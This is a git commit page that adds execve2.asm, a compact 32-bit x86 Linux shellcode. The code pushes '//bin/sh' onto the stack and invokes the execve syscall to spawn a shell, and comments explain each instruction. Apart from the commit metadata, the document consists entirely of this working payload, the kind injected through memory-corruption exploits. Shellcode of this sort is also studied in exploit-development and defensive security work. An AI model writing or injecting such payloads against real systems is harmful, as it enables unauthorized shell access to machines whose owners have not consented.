diff options
| author | toni <matzeton@googlemail.com> | 2014-11-04 18:01:30 +0100 |
|---|---|---|
| committer | toni <matzeton@googlemail.com> | 2014-11-04 18:01:30 +0100 |
| commit | 82c998c5048ec2df4a809192493033ee65e1bdf3 (patch) | |
| tree | 4ed0200ef116625abe3a7febab5bdab83a494427 /shellcode | |
| parent | 701bb59b9e9b1c7c5cf3f4ca32e340ca9c503493 (diff) | |
- added execve2 shellcode: does the same like execve but is quite smaller
Diffstat (limited to 'shellcode')
| -rw-r--r-- | shellcode/execve2.asm | 16 |
1 files changed, 16 insertions, 0 deletions
diff --git a/shellcode/execve2.asm b/shellcode/execve2.asm new file mode 100644 index 0000000..cd094be --- /dev/null +++ b/shellcode/execve2.asm @@ -0,0 +1,16 @@ +BITS 32 + +; Method 2: Push the string directly onto the stack instead of using the 'string trick' + +; zero out registers +xor eax,eax +xor ecx,ecx +cdq ; convert dword in eax to qword in edx + +; push the string //bin/sh onto the stack +push 0x68732f6e ; push 'hs/n' +push 0x69622f2f ; push 'ib//' +mov ebx,esp ; first argument for execve -> stack pointer = pointer to our string +mov byte [esp + 8], al ; null-terminate the string +mov al,0xb ; syscall number 0xb (11) is execve +int 0x80 ; let the kernel do the stuff |